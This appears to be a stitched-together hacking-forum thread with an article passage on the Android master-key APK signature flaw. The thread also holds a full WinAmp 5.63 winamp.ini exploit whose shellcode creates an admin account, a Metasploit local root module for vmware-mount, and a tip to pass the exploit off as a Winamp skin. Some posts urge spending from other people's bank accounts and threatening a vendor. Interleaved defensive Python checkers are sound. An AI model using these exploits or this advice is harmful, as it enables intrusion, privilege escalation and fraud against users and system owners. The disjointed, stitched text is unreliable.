Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF:

Now try to modify any of these files; for example, modify the launch image file inside the MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using adb, and you will find that Android rightly notices it and shows this message:

How Is the Attack Accomplished?

The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code.

The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn't prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below.

The ic_launcher.png file is something that I have added to the existing file and created a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate, and Android happily accepts the same.

How Is This Even Possible?

This is possible because Android verifies the first version of any file in the archive, but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is a fake, but what gets verified for signature is the legitimate part.

What Are the Implications?

The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user's knowledge, make background calls, take pictures and forward them to mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the Play Store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system and their applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always-internet-connected mobile phones.

The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers by publishing popular games in third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the Play Store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren't going to help the cause.

What Precautions Could Help Users to Stay Away from This?

It's important to download the apps only from the Google Play Store and, even while downloading from the Play Store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say "No" to side loading of applications. In short, make sure you identify the publisher of the application before you install one.

Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available.

Apart from these, an application also released in the Play Store, "Blue Box Security Scanner," will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program.

Video

Here is the video link that practically demonstrates how this can be accomplished:

Source: Android Master Key Vulnerability—PoC
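A check a defender can run over an APK before trusting it, as an added example that is not from the article or from Bluebox: it walks the ZIP central directory with Python's zipfile module, hashes every copy of a repeated name independently (each entry is opened by its own header offset, so the name lookup, which only keeps the last copy, is never used), and reports the first copy (the one the article says the signature verifier checks) next to the last copy (the one it says the installer extracts). The archive it inspects is constructed in memory for the demonstration; MyFirstApp.apk and HackedFile.apk from the article are not used, and the entry names and contents are made up.

```python
import hashlib
import io
import warnings
import zipfile
from collections import defaultdict

# Constructed sample data for this example (not files from the article's APK).
DUPLICATED_NAME = "res/drawable-hdpi/ic_launcher.png"
ORIGINAL_IMAGE = b"ORIGINAL-IMAGE"   # first copy: the one the verifier hashes
REPLACED_IMAGE = b"REPLACED-IMAGE"   # last copy, same name: the one the installer extracts


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_sample_apk(with_duplicate: bool) -> bytes:
    """Build a small APK-like ZIP in memory; optionally repeat one entry name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("classes.dex", b"dex\n035-constructed")
        zf.writestr(DUPLICATED_NAME, ORIGINAL_IMAGE)
        if with_duplicate:
            # zipfile only warns about a repeated name; the ZIP format allows it,
            # and the second central-directory record is written all the same.
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                zf.writestr(DUPLICATED_NAME, REPLACED_IMAGE)
    return buf.getvalue()


def find_duplicate_entries(apk_bytes: bytes) -> dict:
    """Map every repeated entry name to the SHA-256 of each copy, in central-directory order."""
    digests = defaultdict(list)
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():          # one ZipInfo per central-directory record
            with zf.open(info) as fh:       # opened by header offset, so each copy is read
                digests[info.filename].append(sha256_hex(fh.read()))
    return {name: hashes for name, hashes in digests.items() if len(hashes) > 1}


def is_safe_to_install(apk_bytes: bytes) -> bool:
    """Policy: one name, one entry. Any repeated name is rejected before verification."""
    return not find_duplicate_entries(apk_bytes)


if __name__ == "__main__":
    for name, hashes in find_duplicate_entries(build_sample_apk(True)).items():
        print(f"{name}: {len(hashes)} copies")
        print(f"  first (what a verifier checks):  {hashes[0]}")
        print(f"  last  (what an installer writes): {hashes[-1]}")
    print("clean archive accepted:", is_safe_to_install(build_sample_apk(False)))
```

The point of hashing each copy rather than just counting names is that the report shows exactly which bytes a signature check would have covered and which bytes would have landed on the device; an installer that enforces is_safe_to_install never reaches the situation the article describes.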
  19. WinAmp 5.63 (winamp.ini) - Local Exploit

# Exploit Title: winampevilskin.py
# Date: 25 August 2013
# Exploit Author: Ayman Sagy <aymansagy@gmail.com>
# Vendor Homepage: http://www.winamp.com/
# Version: 5.63
# Tested on: Windows XP Professional SP3 Version 2002
# CVE : 2013-4694
#
# Ayman Sagy <aymansagy@gmail.com> August 2013
#
# This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/
# Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security
#
# The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup
#
#
# I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it
# If you can make it work or find a solution for ASLR/DEP please contact me
#
# So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it
# The egg and shellcode can be found in plain ASCII in memory
#
# Tested against Windows XP Pro SP3
# Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
# run with Python 2.7

import sys, getopt, os


def usage():
    print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n')
    print('Usage: python ' + sys.argv[0] + ' -p <payload>')
    print('Payload could be:')
    print('\t[user] to create new admin account ayman/P@ssw0rd')
    print('\t[calc] run calculator')
    print('for e.g.: python ' + sys.argv[0] + ' -p user')


#appdata = os.environ['APPDATA']

# Windows add admin user: ayman P@ssw0rd
scadduser = (
    b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" +
    "\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" +
    "\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" +
    "\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" +
    "\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" +
    "\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" +
    "\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" +
    "\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" +
    "\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" +
    "\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" +
    "\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" +
    "\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" +
    "\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" +
    "\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" +
    "\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" +
    "\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" +
    "\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" +
    "\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" +
    "\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" +
    "\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" +
    "\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" +
    "\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f"
)

# http://shell-storm.org/shellcode/files/shellcode-739.php
sccalc = (
    b"\x31\xC9" +               # xor ecx,ecx
    "\x51" +                    # push ecx
    "\x68\x63\x61\x6C\x63" +    # push 0x636c6163
    "\x54" +                    # push dword ptr esp
    "\xB8\xC7\x93\xC2\x77" +    # mov eax,0x77c293c7
    "\xFF\xD0"                  # call eax
)

if len(sys.argv) < 2:
    usage()
    exit(1)

try:
    opts, args = getopt.getopt(sys.argv[1:], 'p:')
except getopt.GetoptError:
    usage()
    exit(1)

for opt, arg in opts:
    if opt == '-p':
        if arg == 'user':
            shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89
        elif arg == "calc":
            shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23
        else:
            print("Error: Invalid payload.\n")
            usage()
            sys.exit()

#print(str(len(shellcode)))

egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
             "\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

sploit = (
    # Unicode-friendly venetian egghunter writer
    # Setup Registers
    "\x50\x72\x50" +        # push eax twice
    "\x72" +                # align
    "\x59\x72\x5f" +        # pop ecx, pop edi
    "\x72" +
    "\x05\xc2\x02\x01" +    # 05 00020001 ADD EAX,1000200
    "\x72" +
    "\x2d\xc2\x01\x01" +    # 2D 00010001 SUB EAX,1000100
    # EAX is now EAX+100
    "\x72\x48" +            # dec eax 4 times
    "\x72\x48" +
    "\x72\x48" +
    "\x72\x48\x72" +
    # Pave Ahead
    # write NOPs in locations that will stop later execution
    "\xc3\x86\xc2\x90" +    # C600 90 MOV BYTE PTR DS:[EAX],90
    "\x72\x40\x72" +        # 40 INC EAX
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x90" +
    "\x72\x40\x72" +
    "\xc2\x91" +            # 91 XCHG EAX,ECX
    "\x72" +                # align
    # Start writing egghunter shellcode, EGG = aymn
    "\xc3\x86\x66" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x81" +    # 81
    "\x72\x40\x72" +
    "\xc3\x86\xc3\x8a" +    # ca
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xbf" +
    "\x72\x40\x72" +
    "\xc3\x86\x0f" +
    "\x72\x40\x72" +
    "\xc3\x86\x42" +        # 42
    "\x72\x40\x72" +
    "\xc3\x86\x52" +
    "\x72\x40\x72" +
    "\xc3\x86\x6a" +
    "\x72\x40\x72" +
    "\xc3\x86\x02" +
    "\x72\x40\x72" +
    "\x34" * 4 +            # Padding
    "\xc3\xb0\x30" +        # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3
    # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
    "\x72" +
    "\xc3\x86\x58" +        # 58
    "\x72\x40\x72" +
    "\xc3\x86\xc3\x8d" +    # cd
    "\x72\x40\x72" +
    "\xc3\x86\x2e" +        # 2e
    "\x72\x40\x72" +
    "\xc3\x86\x3c" +        # 3c
    "\x72\x40\x72" +
    "\xc3\x86\x05" +        # 5
    "\x72\x40\x72" +
    "\xc3\x86\x5a" +
    "\x72\x40\x72" +
    "\xc3\x86\x74" +
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xaf" +    # ef
    "\x72\x40\x72" +
    "\xc3\x86\xc2\xb8" +
    "\x72\x40\x72" +
    "\xc3\x86\x61" +
    "\x72\x40\x72" +
    "\xc3\x86\x79" +
    "\x72\x40\x72" +
    "\xc3\x86\x6d" +
    "\x72\x40\x72" +
    "\xc3\x86\x6e" +
    "\x72\x40\x72" +
    "\xc3\x86\xc2\x8b" +
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xba" +    # fa
    "\x72\x40\x72" +
    "\xc3\x86\xc2\xaf" +    # af
    "\x72\x40\x72" +
    "\xc3\x86\x75" +        # 75
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xaa" +    # ea
    "\x72\x40\x72" +
    "\xc3\x86\xc2\xaf" +    # af
    "\x72\x40\x72" +
    "\xc3\x86\x75" +        # 75
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xa7" +    # e7
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xbf" +    # ff
    "\x72\x40\x72" +
    "\xc3\x86\xc3\xa7" +    # e7
    "\x72" +
    "\x57" +                # 57 PUSH EDI
    "\x72" +                # align
    "\xc3\x83" +            # C3 RETN
    "\x34" * 200            # Padding
)

winamp = ("[Winamp]\r\nutf8=1\r\n" +
          "skin=" + sploit + "\r\n" +
          "[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" +
          "[in_wm]\r\nnumtypes=7\r\n" +
          "type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" +
          "protocol0=0\r\navtype0=0\r\n" +
          "type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" +
          "protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" +
          "description2=Advanced Streaming Format (*.ASF)\r\n" +
          "protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" +
          "description3=Windows Media Stream\r\nprotocol3=1\r\n" +
          "avtype3=1\r\ntype4=MMSU://\r\n" +
          "description4=Windows Media Stream\r\nprotocol4=1\r\n" +
          "avtype4=1\r\ntype5=MMST://\r\n" +
          "description5=Windows Media Stream\r\nprotocol5=1\r\n" +
          "avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode +
          "\r\nprotocol6=0\r\navtype6=0\r\n")

#f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f.write(winamp)
f.close()
print("winamp.ini written, copy it into %APPDATA%\\Winamp")

Source: WinAmp 5.63 (winamp.ini) - Local Exploit

It didn't work for me on Windows 7. I'll try it on XP. Suggestion: rename the file to ".wsz" (Winamp Skin). If someone double-clicks it, it will ask whether to install the skin and... the shellcode should execute. And it is possible to convince someone to install a new Winamp skin.
  20. Keep them. Permanent ban, no accounts from payment systems or banks.
  21. VMWare Setuid vmware-mount Unsafe popen(3)

Authored by Tavis Ormandy, egypt | Site metasploit.com

VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info, {
      'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
      'Description' => %q{
        VMWare Workstation (up to and including 9.0.2 build-1031769) and Player
        have a setuid executable called vmware-mount that invokes lsb_release in
        the PATH with popen(3). Since PATH is user-controlled, and the default
        system shell on Debian-derived distributions does not drop privs, we can
        put an arbitrary payload in an executable called lsb_release and have
        vmware-mount happily execute it as root for us.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Tavis Ormandy', # Vulnerability discovery and PoC
        'egypt'          # Metasploit module
      ],
      'Platform' => [ 'linux' ],
      'Arch' => ARCH_X86,
      'Targets' => [
        [ 'Automatic', { } ],
      ],
      'DefaultOptions' => {
        "PrependSetresuid" => true,
        "PrependSetresgid" => true,
      },
      'Privileged' => true,
      'DefaultTarget' => 0,
      'References' => [
        [ 'CVE', '2013-1662' ],
        [ 'OSVDB', '96588' ],
        [ 'BID', '61966'],
        [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
        [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
      ],
      'DisclosureDate' => "Aug 22 2013"
    } ))

    # Handled by ghetto hardcoding below.
    deregister_options("PrependFork")
  end

  def check
    if setuid?("/usr/bin/vmware-mount")
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    # Ghetto PrependFork action which is apparently only implemented for
    # Meterpreter.
    # XXX Put this in a mixin somewhere
    # if(fork()) exit(0);
    #   6A02   push byte +0x2
    #   58     pop eax
    #   CD80   int 0x80 ; fork
    #   85C0   test eax,eax
    #   7406   jz 0xf
    #   31C0   xor eax,eax
    #   B001   mov al,0x1
    #   CD80   int 0x80 ; exit
    exe = generate_payload_exe(
      :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
    )
    write_file("lsb_release", exe)
    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f lsb_release")
  end

  # Uses the path it is given rather than a second hard-coded copy of it.
  def setuid?(remote_file)
    !!(cmd_exec("test -u #{remote_file} && echo true").index "true")
  end
end

Source: VMWare Setuid vmware-mount Unsafe popen(3) ≈ Packet Storm
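The defensive counterpart of the bug the description above names, as an added example that is not from VMware or from the Metasploit module: a privileged program that has to run a helper locates it on a fixed search path instead of the caller's PATH, rejects helper names that carry a path component, reduces the environment it hands to the child to an allow-list, spawns the child without a shell, and drops any saved setuid/setgid identity first. TRUSTED_PATH, ALLOWED_ENV and the placeholder script that compare_lookups plants in a temporary directory are assumptions constructed for the demonstration; compare_lookups only reports which file each kind of lookup resolves to, it never runs it.

```python
import os
import shutil
import subprocess
import tempfile

# Fixed search path for privileged helpers (assumed); the caller's PATH is never consulted.
TRUSTED_PATH = "/usr/bin:/bin"
# Variables a privileged program may inherit from its caller (an assumed allow-list);
# everything else, PATH and loader variables included, is dropped.
ALLOWED_ENV = ("LANG", "LC_ALL", "TZ")
HELPER = "lsb_release"  # the program vmware-mount runs through popen(3)


def resolve_helper(name, search_path):
    """Locate a helper by bare name on an explicit search path.

    Names containing a path separator are rejected so that nothing like
    ./lsb_release or ../lsb_release can be smuggled in as a 'name'.
    """
    if not name or "/" in name:
        raise ValueError("helper must be a bare program name")
    return shutil.which(name, path=search_path)


def sanitized_env(caller_env):
    """Build the environment a setuid program should hand to any child it spawns."""
    env = {key: value for key, value in caller_env.items() if key in ALLOWED_ENV}
    env["PATH"] = TRUSTED_PATH
    return env


def drop_privileges():
    """Give up a setuid/setgid identity before spawning anything; a no-op when none is held."""
    if hasattr(os, "setresgid") and os.getgid() != os.getegid():
        gid = os.getgid()
        os.setresgid(gid, gid, gid)
    if hasattr(os, "setresuid") and os.getuid() != os.geteuid():
        uid = os.getuid()
        os.setresuid(uid, uid, uid)


def run_helper(name, caller_env):
    """Hardened replacement for popen(name): absolute path, no shell, scrubbed environment."""
    path = resolve_helper(name, TRUSTED_PATH)
    if path is None:
        return None
    drop_privileges()
    completed = subprocess.run([path], env=sanitized_env(caller_env),
                               capture_output=True, text=True, check=False)
    return completed.stdout


def compare_lookups():
    """Constructed demonstration of the two lookups.

    A harmless placeholder script named like the helper is written to a temporary
    directory that is put first on a caller-style PATH. Returns two booleans:
    whether the PATH-honouring lookup resolved to the placeholder, and whether the
    fixed-path lookup stayed clear of it. Nothing is executed.
    """
    with tempfile.TemporaryDirectory() as untrusted_dir:
        planted = os.path.join(untrusted_dir, HELPER)
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")
        os.chmod(planted, 0o755)
        caller_path = untrusted_dir + os.pathsep + TRUSTED_PATH
        naive = resolve_helper(HELPER, caller_path)      # what popen(3)'s shell lookup amounts to
        hardened = resolve_helper(HELPER, TRUSTED_PATH)  # never sees untrusted_dir
        return naive == planted, hardened != planted


if __name__ == "__main__":
    print("PATH lookup hits placeholder / fixed-path lookup avoids it:", compare_lookups())
    print("environment handed to the child:", sanitized_env(dict(os.environ)))
```

The shell in popen(3) is what makes PATH matter in the first place; passing an argument list to subprocess.run removes the shell, the fixed search path removes the caller's control over which binary is found, and dropping privileges before the spawn limits what a mistaken helper could do even if the first two measures were defeated.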
  22. Yes, Intel, with their CISC (Complex Instruction Set Computing) processors, is trying to muscle in on ARM, which are RISC (Reduced Instruction Set Computing) processors. Now the question comes down to this: power (Intel) or low consumption (ARM)? I wouldn't mind an Intel Atom in a phone, but I would mind the battery lasting me 2 hours.
  23. Or read this: Files ≈ Packet Storm. And make a few payments from other people's accounts, buy yourself a chocolate bar.
  24. Do a disclosure for the duplicate ones. More precisely, I don't think it takes them 2 years to fix an XSS. So in many cases I don't think it's really a duplicate. Threaten to make it public, at least see what they say.
  25. memcpy((void *)(1<<12), &patch_current, 1024);